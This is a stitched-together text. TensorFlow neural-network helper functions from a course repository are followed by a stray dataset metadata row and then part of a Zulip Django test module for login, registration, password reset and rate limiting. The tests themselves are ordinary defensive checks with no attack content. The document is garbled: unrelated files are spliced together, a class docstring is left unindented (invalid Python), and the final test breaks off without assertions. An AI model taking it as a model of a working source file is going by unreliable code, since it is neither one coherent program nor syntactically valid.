def binary_cross_entropy(z, x, name=None):
    """Binary Cross Entropy measures cross entropy of a binary variable.

    loss(x, z) = - sum_i (x[i] * log(z[i]) + (1 - x[i]) * log(1 - z[i]))

    Parameters
    ----------
    z : tf.Tensor
        A `Tensor` of the same type and shape as `x` (the predictions).
    x : tf.Tensor
        A `Tensor` of type `float32` or `float64` (the targets).
    name : str, optional
        Variable scope name (defaults to 'bce').

    Returns
    -------
    loss : tf.Tensor
        Elementwise (unreduced) binary cross-entropy.
    """
    with tf.variable_scope(name or 'bce'):
        # Epsilon keeps log() finite when z is exactly 0 or 1.
        eps = 1e-12
        return (-(x * tf.log(z + eps) +
                  (1. - x) * tf.log(1. - z + eps)))
def conv2d(x, n_output,
           k_h=5, k_w=5, d_h=2, d_w=2,
           padding='SAME', name='conv2d', reuse=None):
    """Helper for creating a 2d convolution operation.

    Parameters
    ----------
    x : tf.Tensor
        Input tensor to convolve.
    n_output : int
        Number of filters.
    k_h : int, optional
        Kernel height
    k_w : int, optional
        Kernel width
    d_h : int, optional
        Height stride
    d_w : int, optional
        Width stride
    padding : str, optional
        Padding type: "SAME" or "VALID"
    name : str, optional
        Variable scope
    reuse : bool or None, optional
        Whether to reuse existing variables in the scope.

    Returns
    -------
    h, W : tf.Tensor, tf.Tensor
        Output of the convolution (after bias add) and the filter
        weights variable.
    """
    with tf.variable_scope(name or 'conv2d', reuse=reuse):
        # Filter shape: [k_h, k_w, in_channels, out_channels].
        W = tf.get_variable(
            name='W',
            shape=[k_h, k_w, x.get_shape()[-1], n_output],
            initializer=tf.contrib.layers.xavier_initializer_conv2d())
        conv = tf.nn.conv2d(
            name='conv',
            input=x,
            filter=W,
            strides=[1, d_h, d_w, 1],
            padding=padding)
        b = tf.get_variable(
            name='b',
            shape=[n_output],
            initializer=tf.constant_initializer(0.0))
        h = tf.nn.bias_add(
            name='h',
            value=conv,
            bias=b)
    return h, W
def deconv2d(x, n_output_h, n_output_w, n_output_ch, n_input_ch=None,
             k_h=5, k_w=5, d_h=2, d_w=2,
             padding='SAME', name='deconv2d', reuse=None):
    """Deconvolution (transposed convolution) helper.

    Parameters
    ----------
    x : tf.Tensor
        Input tensor to convolve.
    n_output_h : int
        Height of output
    n_output_w : int
        Width of output
    n_output_ch : int
        Number of filters.
    n_input_ch : int, optional
        Number of input channels; inferred from `x` when None.
    k_h : int, optional
        Kernel height
    k_w : int, optional
        Kernel width
    d_h : int, optional
        Height stride
    d_w : int, optional
        Width stride
    padding : str, optional
        Padding type: "SAME" or "VALID"
    name : str, optional
        Variable scope
    reuse : bool or None, optional
        Whether to reuse existing variables in the scope.

    Returns
    -------
    h, W : tf.Tensor, tf.Tensor
        Output of the deconvolution (after bias add) and the filter
        weights variable.
    """
    with tf.variable_scope(name or 'deconv2d', reuse=reuse):
        # conv2d_transpose filter shape is [k_h, k_w, out_ch, in_ch].
        W = tf.get_variable(
            name='W',
            shape=[k_h, k_w, n_output_ch, n_input_ch or x.get_shape()[-1]],
            initializer=tf.contrib.layers.xavier_initializer_conv2d())
        conv = tf.nn.conv2d_transpose(
            name='conv_t',
            value=x,
            filter=W,
            # Output batch size follows the (possibly dynamic) input batch.
            output_shape=tf.stack(
                [tf.shape(x)[0], n_output_h, n_output_w, n_output_ch]),
            strides=[1, d_h, d_w, 1],
            padding=padding)
        # conv2d_transpose loses static shape info; restore it here.
        conv.set_shape([None, n_output_h, n_output_w, n_output_ch])
        b = tf.get_variable(
            name='b',
            shape=[n_output_ch],
            initializer=tf.constant_initializer(0.0))
        h = tf.nn.bias_add(name='h', value=conv, bias=b)
    return h, W
def lrelu(features, leak=0.2):
    """Leaky rectifier activation.

    Computes max(features, leak * features) using the branch-free
    identity 0.5*(1+leak)*x + 0.5*(1-leak)*|x|.

    Parameters
    ----------
    features : tf.Tensor
        Input to apply leaky rectifier to.
    leak : float, optional
        Percentage of leak.

    Returns
    -------
    op : tf.Tensor
        Resulting output of applying leaky rectifier activation.
    """
    pos_gain = 0.5 * (1 + leak)
    neg_gain = 0.5 * (1 - leak)
    return pos_gain * features + neg_gain * abs(features)
def linear(x, n_output, name=None, activation=None, reuse=None):
    """Fully connected layer.

    Parameters
    ----------
    x : tf.Tensor
        Input tensor to connect; flattened first if not 2-D.
    n_output : int
        Number of output neurons
    name : None, optional
        Scope to apply (defaults to "fc")
    activation : callable, optional
        Activation function applied to the output (e.g. tf.nn.relu).
    reuse : bool or None, optional
        Whether to reuse existing variables in the scope.

    Returns
    -------
    h, W : tf.Tensor, tf.Tensor
        Output of fully connected layer and the weight matrix
    """
    # Collapse any higher-rank input to [batch, features] first.
    if len(x.get_shape()) != 2:
        x = flatten(x, reuse=reuse)

    n_input = x.get_shape().as_list()[1]

    with tf.variable_scope(name or "fc", reuse=reuse):
        W = tf.get_variable(
            name='W',
            shape=[n_input, n_output],
            dtype=tf.float32,
            initializer=tf.contrib.layers.xavier_initializer())

        b = tf.get_variable(
            name='b',
            shape=[n_output],
            dtype=tf.float32,
            initializer=tf.constant_initializer(0.0))

        h = tf.nn.bias_add(
            name='h',
            value=tf.matmul(x, W),
            bias=b)

        if activation:
            h = activation(h)

        return h, W
def flatten(x, name=None, reuse=None):
    """Flatten Tensor to 2-dimensions.

    Parameters
    ----------
    x : tf.Tensor
        Input tensor to flatten.
    name : None, optional
        Variable scope for flatten operations (defaults to 'flatten').
    reuse : bool or None, optional
        Scope reuse flag, forwarded to tf.variable_scope.  flatten()
        creates no variables itself, so this only affects nesting.

    Returns
    -------
    flattened : tf.Tensor
        Flattened tensor.

    Raises
    ------
    ValueError
        If `x` is not 1-, 2- or 4-dimensional.
    """
    # FIX: the original hard-coded the scope name and ignored both the
    # `name` and `reuse` parameters; forward them so callers (e.g.
    # linear()) actually get the scope they request.
    with tf.variable_scope(name or 'flatten', reuse=reuse):
        dims = x.get_shape().as_list()
        if len(dims) == 4:
            # Collapse H x W x C into a single feature axis.
            flattened = tf.reshape(
                x,
                shape=[-1, dims[1] * dims[2] * dims[3]])
        elif len(dims) == 2 or len(dims) == 1:
            # Already flat; pass through unchanged.
            flattened = x
        else:
            raise ValueError('Expected n dimensions of 1, 2 or 4. Found:',
                             len(dims))

        return flattened
def to_tensor(x):
    """Convert 2 dim Tensor to a 4 dim Tensor ready for convolution.

    Performs the opposite of flatten(x). If the tensor is already 4-D, this
    returns the same as the input, leaving it unchanged.

    Parameters
    ----------
    x : tf.Tensor
        Input 2-D tensor. If 4-D already, left unchanged.

    Returns
    -------
    x : tf.Tensor
        4-D representation of the input.

    Raises
    ------
    ValueError
        If the tensor is not 2D or already 4D.
    """
    if len(x.get_shape()) == 2:
        n_input = x.get_shape().as_list()[1]
        x_dim = np.sqrt(n_input)
        if x_dim == int(x_dim):
            # Perfect square: assume a square single-channel image.
            x_dim = int(x_dim)
            x_tensor = tf.reshape(
                x, [-1, x_dim, x_dim, 1], name='reshape')
        elif np.sqrt(n_input / 3) == int(np.sqrt(n_input / 3)):
            # Perfect square after dividing by 3: assume square RGB image.
            x_dim = int(np.sqrt(n_input / 3))
            x_tensor = tf.reshape(
                x, [-1, x_dim, x_dim, 3], name='reshape')
        else:
            # Fallback: treat the features as 1x1 spatial with n_input channels.
            x_tensor = tf.reshape(
                x, [-1, 1, 1, n_input], name='reshape')
    elif len(x.get_shape()) == 4:
        x_tensor = x
    else:
        raise ValueError('Unsupported input dimensions')
    return x_tensor
| niazangels/CADL | session-5/libs/utils.py | Python | apache-2.0 | 21,027 | [
"Gaussian"
] | e54985b4885462a6e89e117fc67d79afcb8309f20b87ab57ade4a1bd646955e0 |
import datetime
import re
import smtplib
import time
import urllib
from typing import Any, List, Optional, Sequence
from unittest.mock import MagicMock, patch
import ujson
from django.conf import settings
from django.contrib.auth.views import INTERNAL_RESET_URL_TOKEN
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils.timezone import now as timezone_now
from confirmation import settings as confirmation_settings
from confirmation.models import (
Confirmation,
ConfirmationKeyException,
MultiuseInvite,
confirmation_url,
create_confirmation_link,
generate_key,
get_object_from_key,
one_click_unsubscribe_link,
)
from zerver.context_processors import common_context
from zerver.decorator import do_two_factor_login
from zerver.forms import HomepageForm, check_subdomain_available
from zerver.lib.actions import (
add_new_user_history,
do_add_default_stream,
do_change_full_name,
do_change_user_role,
do_create_default_stream_group,
do_create_realm,
do_create_user,
do_deactivate_realm,
do_deactivate_user,
do_get_user_invites,
do_invite_users,
do_set_realm_property,
get_default_streams_for_realm,
get_stream,
)
from zerver.lib.email_notifications import enqueue_welcome_emails, followup_day2_email_delay
from zerver.lib.initial_password import initial_password
from zerver.lib.mobile_auth_otp import (
ascii_to_hex,
hex_to_ascii,
is_valid_otp,
otp_decrypt_api_key,
otp_encrypt_api_key,
xor_hex_strings,
)
from zerver.lib.name_restrictions import is_disposable_domain
from zerver.lib.rate_limiter import add_ratelimit_rule, remove_ratelimit_rule
from zerver.lib.send_email import FromAddress, deliver_email, send_future_email
from zerver.lib.stream_subscription import get_stream_subscriptions_for_user
from zerver.lib.streams import create_stream_if_needed
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import (
avatar_disk_path,
find_key_by_email,
get_test_image_file,
load_subdomain_token,
queries_captured,
reset_emails_in_zulip_realm,
)
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
DefaultStream,
Message,
PreregistrationUser,
Realm,
Recipient,
ScheduledEmail,
Stream,
Subscription,
UserMessage,
UserProfile,
flush_per_request_caches,
get_realm,
get_system_bot,
get_user,
get_user_by_delivery_email,
)
from zerver.views.auth import redirect_and_log_into_subdomain, start_two_factor_auth
from zerver.views.development.registration import confirmation_key
from zerver.views.invite import get_invitee_emails_set
from zproject.backends import ExternalAuthDataDict, ExternalAuthResult
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
    """Tests the data embedded in the signed subdomain-login token
    produced by redirect_and_log_into_subdomain()."""

    def test_data(self) -> None:
        # Case 1: plain login for an existing user: the token carries
        # name/email/subdomain with is_signup=False.
        realm = get_realm("zulip")
        user_profile = self.example_user("hamlet")
        name = user_profile.full_name
        email = user_profile.delivery_email
        response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile))
        data = load_subdomain_token(response)
        self.assertDictEqual(data, {'full_name': name,
                                    'email': email,
                                    'subdomain': realm.subdomain,
                                    'is_signup': False})

        # Case 2: signup requested, but the email already has an account.
        data_dict = ExternalAuthDataDict(is_signup=True, multiuse_object_key='key')
        response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile,
                                                                      data_dict=data_dict))
        data = load_subdomain_token(response)
        self.assertDictEqual(data, {'full_name': name,
                                    'email': email,
                                    'subdomain': realm.subdomain,
                                    # the email has an account at the subdomain,
                                    # so is_signup get overridden to False:
                                    'is_signup': False,
                                    'multiuse_object_key': 'key',
                                    })

        # Case 3: signup for a brand-new email; is_signup survives.
        data_dict = ExternalAuthDataDict(email=self.nonreg_email("alice"),
                                         full_name="Alice",
                                         subdomain=realm.subdomain,
                                         is_signup=True,
                                         full_name_validated=True,
                                         multiuse_object_key='key')
        response = redirect_and_log_into_subdomain(ExternalAuthResult(data_dict=data_dict))
        data = load_subdomain_token(response)
        self.assertDictEqual(data, {'full_name': "Alice",
                                    'email': self.nonreg_email("alice"),
                                    'full_name_validated': True,
                                    'subdomain': realm.subdomain,
                                    'is_signup': True,
                                    'multiuse_object_key': 'key',
                                    })
class DeactivationNoticeTestCase(ZulipTestCase):
    """Tests the redirects between login/registration pages and the
    realm-deactivation notice page."""

    def test_redirection_for_deactivated_realm(self) -> None:
        """Login and registration on a deactivated realm redirect to the notice."""
        realm = get_realm("zulip")
        realm.deactivated = True
        realm.save(update_fields=["deactivated"])

        for url in ('/register/', '/login/'):
            result = self.client_get(url)
            self.assertEqual(result.status_code, 302)
            self.assertIn('deactivated', result.url)

    def test_redirection_for_active_realm(self) -> None:
        """An active realm serves login/registration pages normally."""
        for url in ('/register/', '/login/'):
            result = self.client_get(url)
            self.assertEqual(result.status_code, 200)

    def test_deactivation_notice_when_realm_is_active(self) -> None:
        """The notice page redirects to login when the realm is active."""
        result = self.client_get('/accounts/deactivated/')
        self.assertEqual(result.status_code, 302)
        self.assertIn('login', result.url)

    def test_deactivation_notice_when_deactivated(self) -> None:
        """The notice page names the deactivated organization."""
        realm = get_realm("zulip")
        realm.deactivated = True
        realm.save(update_fields=["deactivated"])

        result = self.client_get('/accounts/deactivated/')
        self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
class AddNewUserHistoryTest(ZulipTestCase):
    """Tests that add_new_user_history() correctly backfills a new user's
    message history, including a race with concurrent message sending."""

    def test_add_new_user_history_race(self) -> None:
        """Sends a message during user creation"""
        # Create a user who hasn't had historical messages added
        realm = get_realm('zulip')
        stream = Stream.objects.get(realm=realm, name='Denmark')
        DefaultStream.objects.create(stream=stream, realm=realm)
        # Make sure at least 3 messages are sent to Denmark and it's a default stream.
        message_id = self.send_stream_message(self.example_user('hamlet'), stream.name, "test 1")
        self.send_stream_message(self.example_user('hamlet'), stream.name, "test 2")
        self.send_stream_message(self.example_user('hamlet'), stream.name, "test 3")

        # Register with history-backfill patched out, so we can run it
        # manually after the racing message below.
        with patch("zerver.lib.actions.add_new_user_history"):
            self.register(self.nonreg_email('test'), "test")
        user_profile = self.nonreg_user('test')

        subs = Subscription.objects.select_related("recipient").filter(
            user_profile=user_profile, recipient__type=Recipient.STREAM)
        streams = Stream.objects.filter(id__in=[sub.recipient.type_id for sub in subs])

        # Sent a message afterwards to trigger a race between message
        # sending and `add_new_user_history`.
        race_message_id = self.send_stream_message(self.example_user('hamlet'),
                                                   streams[0].name, "test")

        # Overwrite ONBOARDING_UNREAD_MESSAGES to 2
        ONBOARDING_UNREAD_MESSAGES = 2
        with patch("zerver.lib.actions.ONBOARDING_UNREAD_MESSAGES",
                   ONBOARDING_UNREAD_MESSAGES):
            add_new_user_history(user_profile, streams)

        # Our first message is in the user's history
        self.assertTrue(UserMessage.objects.filter(user_profile=user_profile,
                                                   message_id=message_id).exists())
        # The race message is in the user's history and marked unread.
        self.assertTrue(UserMessage.objects.filter(user_profile=user_profile,
                                                   message_id=race_message_id).exists())
        self.assertFalse(UserMessage.objects.get(user_profile=user_profile,
                                                 message_id=race_message_id).flags.read.is_set)

        # Verify that the ONBOARDING_UNREAD_MESSAGES latest messages
        # that weren't the race message are marked as unread.
        latest_messages = UserMessage.objects.filter(
            user_profile=user_profile,
            message__recipient__type=Recipient.STREAM,
        ).exclude(message_id=race_message_id).order_by('-message_id')[0:ONBOARDING_UNREAD_MESSAGES]
        self.assertEqual(len(latest_messages), 2)
        for msg in latest_messages:
            self.assertFalse(msg.flags.read.is_set)

        # Verify that older messages are correctly marked as read.
        older_messages = UserMessage.objects.filter(
            user_profile=user_profile,
            message__recipient__type=Recipient.STREAM,
        ).exclude(message_id=race_message_id).order_by(
            '-message_id')[ONBOARDING_UNREAD_MESSAGES:ONBOARDING_UNREAD_MESSAGES + 1]
        self.assertTrue(len(older_messages) > 0)
        for msg in older_messages:
            self.assertTrue(msg.flags.read.is_set)
class InitialPasswordTest(ZulipTestCase):
    """Tests for the development-only initial_password() helper."""

    def test_none_initial_password_salt(self) -> None:
        # Without a salt configured, no initial password can be derived.
        with self.settings(INITIAL_PASSWORD_SALT=None):
            self.assertIsNone(initial_password('test@test.com'))
class PasswordResetTest(ZulipTestCase):
    """
    Log in, reset password, log out, log in with new password.
    """

    def get_reset_mail_body(self) -> str:
        """Return the body of the single reset email in the outbox, after
        verifying it was sent from the noreply security address."""
        from django.core.mail import outbox
        [message] = outbox
        self.assertRegex(
            message.from_email,
            fr"^Zulip Account Security <{self.TOKENIZED_NOREPLY_REGEX}>\Z",
        )
        return message.body

    def test_password_reset(self) -> None:
        """Full happy path: request a reset, follow the emailed link,
        set a new password, and confirm the old one no longer works."""
        user = self.example_user("hamlet")
        email = user.delivery_email
        old_password = initial_password(email)

        self.login_user(user)

        # test password reset template
        result = self.client_get('/accounts/password/reset/')
        self.assert_in_response('Reset your password', result)

        # start the password reset process by supplying an email address
        result = self.client_post('/accounts/password/reset/', {'email': email})

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            "/accounts/password/reset/done/"))
        result = self.client_get(result["Location"])

        self.assert_in_response("Check your email in a few minutes to finish the process.", result)

        # Check that the password reset email is from a noreply address.
        body = self.get_reset_mail_body()
        self.assertIn("reset your password", body)

        # Visit the password reset link.
        password_reset_url = self.get_confirmation_url_from_outbox(
            email, url_pattern=settings.EXTERNAL_HOST + r"(\S\S+)")
        result = self.client_get(password_reset_url)
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result.url.endswith(f'/{INTERNAL_RESET_URL_TOKEN}/'))

        final_reset_url = result.url
        result = self.client_get(final_reset_url)
        self.assertEqual(result.status_code, 200)

        # Reset your password
        with self.settings(PASSWORD_MIN_LENGTH=3, PASSWORD_MIN_GUESSES=1000):
            # Verify weak passwords don't work.
            result = self.client_post(final_reset_url,
                                      {'new_password1': 'easy',
                                       'new_password2': 'easy'})
            self.assert_in_response("The password is too weak.",
                                    result)

            result = self.client_post(final_reset_url,
                                      {'new_password1': 'f657gdGGk9',
                                       'new_password2': 'f657gdGGk9'})
            # password reset succeeded
            self.assertEqual(result.status_code, 302)
            self.assertTrue(result["Location"].endswith("/password/done/"))

            # log back in with new password
            self.login_by_email(email, password='f657gdGGk9')
            user_profile = self.example_user('hamlet')
            self.assert_logged_in_user_id(user_profile.id)

            # make sure old password no longer works
            self.assert_login_failure(email, password=old_password)

    def test_password_reset_for_non_existent_user(self) -> None:
        """Resetting a nonexistent address still shows the generic page but
        sends a 'no account' email (no user enumeration via the UI)."""
        email = 'nonexisting@mars.com'

        # start the password reset process by supplying an email address
        result = self.client_post('/accounts/password/reset/', {'email': email})

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            "/accounts/password/reset/done/"))
        result = self.client_get(result["Location"])

        self.assert_in_response("Check your email in a few minutes to finish the process.", result)

        # Check that the password reset email is from a noreply address.
        body = self.get_reset_mail_body()
        self.assertIn('Somebody (possibly you) requested a new password', body)
        self.assertIn('You do not have an account', body)
        self.assertIn('safely ignore', body)
        self.assertNotIn('reset your password', body)
        self.assertNotIn('deactivated', body)

    def test_password_reset_for_deactivated_user(self) -> None:
        """A deactivated user gets an email explaining the deactivation,
        not a working reset link."""
        user_profile = self.example_user("hamlet")
        email = user_profile.delivery_email
        do_deactivate_user(user_profile)

        # start the password reset process by supplying an email address
        result = self.client_post('/accounts/password/reset/', {'email': email})

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            "/accounts/password/reset/done/"))
        result = self.client_get(result["Location"])

        self.assert_in_response("Check your email in a few minutes to finish the process.", result)

        # Check that the password reset email is from a noreply address.
        body = self.get_reset_mail_body()
        self.assertIn('Somebody (possibly you) requested a new password', body)
        self.assertIn('has been deactivated', body)
        self.assertIn('safely ignore', body)
        self.assertNotIn('reset your password', body)
        self.assertNotIn('not have an account', body)

    def test_password_reset_with_deactivated_realm(self) -> None:
        """A deactivated realm logs the attempt and sends no email at all."""
        user_profile = self.example_user("hamlet")
        email = user_profile.delivery_email
        do_deactivate_realm(user_profile.realm)

        # start the password reset process by supplying an email address
        with patch('logging.info') as mock_logging:
            result = self.client_post('/accounts/password/reset/', {'email': email})
            mock_logging.assert_called_once()

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            "/accounts/password/reset/done/"))
        result = self.client_get(result["Location"])

        self.assert_in_response("Check your email in a few minutes to finish the process.", result)

        # Check that the password reset email is from a noreply address.
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)

    @override_settings(RATE_LIMITING=True)
    def test_rate_limiting(self) -> None:
        """Password reset emails are rate-limited per address, and the
        limit expires after the configured window."""
        user_profile = self.example_user("hamlet")
        email = user_profile.delivery_email
        from django.core.mail import outbox

        add_ratelimit_rule(10, 2, domain='password_reset_form_by_email')
        start_time = time.time()
        with patch('time.time', return_value=start_time):
            self.client_post('/accounts/password/reset/', {'email': email})
            self.client_post('/accounts/password/reset/', {'email': email})
            self.assert_length(outbox, 2)

            # Too many password reset emails sent to the address, we won't send more.
            self.client_post('/accounts/password/reset/', {'email': email})
            self.assert_length(outbox, 2)

            # Resetting for a different address works though.
            self.client_post('/accounts/password/reset/', {'email': self.example_email("othello")})
            self.assert_length(outbox, 3)
            self.client_post('/accounts/password/reset/', {'email': self.example_email("othello")})
            self.assert_length(outbox, 4)

        # After time, password reset emails can be sent again.
        with patch('time.time', return_value=start_time + 11):
            self.client_post('/accounts/password/reset/', {'email': email})
            self.client_post('/accounts/password/reset/', {'email': email})
            self.assert_length(outbox, 6)

        remove_ratelimit_rule(10, 2, domain='password_reset_form_by_email')

    def test_wrong_subdomain(self) -> None:
        """Requesting a reset on a subdomain where the user has no account
        sends a 'no account here' email listing their real organizations."""
        email = self.example_email("hamlet")

        # start the password reset process by supplying an email address
        result = self.client_post(
            '/accounts/password/reset/', {'email': email},
            subdomain="zephyr")

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            "/accounts/password/reset/done/"))
        result = self.client_get(result["Location"])

        self.assert_in_response("Check your email in a few minutes to finish the process.", result)

        body = self.get_reset_mail_body()
        self.assertIn('Somebody (possibly you) requested a new password', body)
        self.assertIn('You do not have an account', body)
        self.assertIn("active accounts in the following organization(s).\nhttp://zulip.testserver",
                      body)
        self.assertIn('safely ignore', body)
        self.assertNotIn('reset your password', body)
        self.assertNotIn('deactivated', body)

    def test_invalid_subdomain(self) -> None:
        """A nonexistent subdomain 404s and sends no email."""
        email = self.example_email("hamlet")

        # start the password reset process by supplying an email address
        result = self.client_post(
            '/accounts/password/reset/', {'email': email},
            subdomain="invalid")

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 404)
        self.assert_in_response("There is no Zulip organization hosted at this subdomain.",
                                result)

        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)

    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_auth_only(self) -> None:
        """If the email auth backend is not enabled, password reset should do nothing"""
        email = self.example_email("hamlet")
        with patch('logging.info') as mock_logging:
            result = self.client_post('/accounts/password/reset/', {'email': email})
            mock_logging.assert_called_once()

        # check the redirect link telling you to check mail for password reset link
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            "/accounts/password/reset/done/"))
        result = self.client_get(result["Location"])

        self.assert_in_response("Check your email in a few minutes to finish the process.", result)

        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)

    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.EmailAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_and_email_auth(self) -> None:
        """If both email and ldap auth backends are enabled, limit password
        reset to users outside the LDAP domain"""
        # If the domain matches, we don't generate an email
        with self.settings(LDAP_APPEND_DOMAIN="zulip.com"):
            email = self.example_email("hamlet")
            with patch('logging.info') as mock_logging:
                result = self.client_post('/accounts/password/reset/', {'email': email})
                mock_logging.assert_called_once_with("Password reset not allowed for user in LDAP domain")
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)

        # If the domain doesn't match, we do generate an email
        with self.settings(LDAP_APPEND_DOMAIN="example.com"):
            email = self.example_email("hamlet")
            with patch('logging.info') as mock_logging:
                result = self.client_post('/accounts/password/reset/', {'email': email})
                self.assertEqual(result.status_code, 302)
                self.assertTrue(result["Location"].endswith(
                    "/accounts/password/reset/done/"))
                result = self.client_get(result["Location"])

        body = self.get_reset_mail_body()
        self.assertIn('reset your password', body)

    def test_redirect_endpoints(self) -> None:
        '''
        These tests are mostly designed to give us 100% URL coverage
        in our URL coverage reports. Our mechanism for finding URL
        coverage doesn't handle redirects, so we just have a few quick
        tests here.
        '''
        result = self.client_get('/accounts/password/reset/done/')
        self.assert_in_success_response(["Check your email"], result)

        result = self.client_get('/accounts/password/done/')
        self.assert_in_success_response(["We've reset your password!"], result)

        result = self.client_get('/accounts/send_confirm/alice@example.com')
        self.assert_in_success_response(["/accounts/home/"], result)

        result = self.client_get('/accounts/new/send_confirm/alice@example.com')
        self.assert_in_success_response(["/new/"], result)
class LoginTest(ZulipTestCase):
"""
Logging in, registration, and logging out.
"""
    def test_login(self) -> None:
        """A valid login establishes a session for the right user."""
        self.login('hamlet')
        user_profile = self.example_user('hamlet')
        self.assert_logged_in_user_id(user_profile.id)
    def test_login_deactivated_user(self) -> None:
        """A deactivated user sees an error and gets no session."""
        user_profile = self.example_user('hamlet')
        do_deactivate_user(user_profile)
        result = self.login_with_return(self.example_email("hamlet"), "xxx")
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("Your account is no longer active.", result)
        self.assert_logged_in_user_id(None)
    def test_login_bad_password(self) -> None:
        """A wrong password fails to log in; the right one succeeds."""
        user = self.example_user("hamlet")
        password = "wrongpassword"
        result = self.login_with_return(user.delivery_email, password=password)
        self.assert_in_success_response([user.delivery_email], result)
        self.assert_logged_in_user_id(None)

        # Parallel test to confirm that the right password works using the
        # same login code, which verifies our failing test isn't broken
        # for some other reason.
        password = initial_password(user.delivery_email)
        result = self.login_with_return(user.delivery_email, password=password)
        self.assertEqual(result.status_code, 302)
        self.assert_logged_in_user_id(user.id)
    @override_settings(RATE_LIMITING_AUTHENTICATE=True)
    def test_login_bad_password_rate_limiter(self) -> None:
        """Repeated failed logins trip the rate limiter even for a later
        correct password; the limit expires with time."""
        user_profile = self.example_user("hamlet")
        email = user_profile.delivery_email
        add_ratelimit_rule(10, 2, domain='authenticate_by_username')

        start_time = time.time()
        with patch('time.time', return_value=start_time):
            self.login_with_return(email, password="wrongpassword")
            self.assert_logged_in_user_id(None)
            self.login_with_return(email, password="wrongpassword")
            self.assert_logged_in_user_id(None)

            # We're over the allowed limit, so the next attempt, even with the correct
            # password, will get blocked.
            result = self.login_with_return(email)
            self.assert_in_success_response(["Try again in 10 seconds"], result)

        # After time passes, we should be able to log in.
        with patch('time.time', return_value=start_time + 11):
            self.login_with_return(email)
            self.assert_logged_in_user_id(user_profile.id)

        remove_ratelimit_rule(10, 2, domain='authenticate_by_username')
    def test_login_nonexist_user(self) -> None:
        """Logging in with an unknown email fails with the generic error."""
        result = self.login_with_return("xxx@zulip.com", "xxx")
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("Please enter a correct email and password", result)
        self.assert_logged_in_user_id(None)
    def test_login_wrong_subdomain(self) -> None:
        """Logging in on a realm the user doesn't belong to fails and logs a warning."""
        with patch("logging.warning") as mock_warning:
            result = self.login_with_return(self.mit_email("sipbtest"), "xxx")
            mock_warning.assert_called_once()
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("Your Zulip account is not a member of the "
                                "organization associated with this subdomain.", result)
        self.assert_logged_in_user_id(None)
    def test_login_invalid_subdomain(self) -> None:
        """Logging in on a nonexistent subdomain 404s."""
        result = self.login_with_return(self.example_email("hamlet"), "xxx",
                                        subdomain="invalid")
        self.assertEqual(result.status_code, 404)
        self.assert_in_response("There is no Zulip organization hosted at this subdomain.", result)
        self.assert_logged_in_user_id(None)
    def test_register(self) -> None:
        """Registration works and its query count stays bounded even with
        many default streams (guarding against O(streams) regressions)."""
        reset_emails_in_zulip_realm()
        realm = get_realm("zulip")
        stream_names = [f"stream_{i}" for i in range(40)]
        for stream_name in stream_names:
            stream = self.make_stream(stream_name, realm=realm)
            DefaultStream.objects.create(stream=stream, realm=realm)

        # Clear all the caches.
        flush_per_request_caches()
        ContentType.objects.clear_cache()

        with queries_captured() as queries:
            self.register(self.nonreg_email('test'), "test")
        # Ensure the number of queries we make is not O(streams)
        self.assertEqual(len(queries), 78)

        user_profile = self.nonreg_user('test')
        self.assert_logged_in_user_id(user_profile.id)
        self.assertFalse(user_profile.enable_stream_desktop_notifications)
    def test_register_deactivated(self) -> None:
        """
        If you try to register for a deactivated realm, you get a clear error
        page.
        """
        realm = get_realm("zulip")
        realm.deactivated = True
        realm.save(update_fields=["deactivated"])

        result = self.client_post('/accounts/home/', {'email': self.nonreg_email('test')},
                                  subdomain="zulip")
        self.assertEqual(result.status_code, 302)
        self.assertEqual('/accounts/deactivated/', result.url)

        # No user should have been created by the blocked registration.
        with self.assertRaises(UserProfile.DoesNotExist):
            self.nonreg_user('test')
    def test_register_deactivated_partway_through(self) -> None:
        """
        If the realm is deactivated after the signup email was requested but
        before the registration form is submitted, you get a clear error page.
        """
        email = self.nonreg_email('test')
        result = self.client_post('/accounts/home/', {'email': email},
                                  subdomain="zulip")
        self.assertEqual(result.status_code, 302)
        self.assertNotIn('deactivated', result.url)

        realm = get_realm("zulip")
        realm.deactivated = True
        realm.save(update_fields=["deactivated"])

        result = self.submit_reg_form_for_user(email, "abcd1234", subdomain="zulip")
        self.assertEqual(result.status_code, 302)
        self.assertEqual('/accounts/deactivated/', result.url)

        # No user should have been created by the blocked registration.
        with self.assertRaises(UserProfile.DoesNotExist):
            self.nonreg_user('test')
    def test_login_deactivated_realm(self) -> None:
        """
        If you try to log in to a deactivated realm, you get a clear error page.
        """
        realm = get_realm("zulip")
        realm.deactivated = True
        realm.save(update_fields=["deactivated"])

